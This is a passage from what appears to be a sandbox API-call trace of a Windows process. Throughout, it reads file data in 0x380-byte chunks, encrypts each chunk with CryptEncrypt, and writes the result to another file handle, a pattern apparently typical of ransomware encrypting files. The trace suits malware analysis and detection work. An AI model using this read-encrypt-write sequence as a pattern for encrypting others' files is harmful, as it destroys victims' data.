lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.600] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.601] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.601] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.601] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.601] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.601] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.602] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.602] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.602] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.602] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.602] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.602] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.603] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.603] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.603] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.603] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.603] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.603] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.604] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.604] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.604] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.604] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.604] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.604] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.605] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.605] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.605] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.605] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.605] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.605] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.606] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.606] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.606] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.606] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.606] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.606] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.607] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.607] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.607] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.607] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.607] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 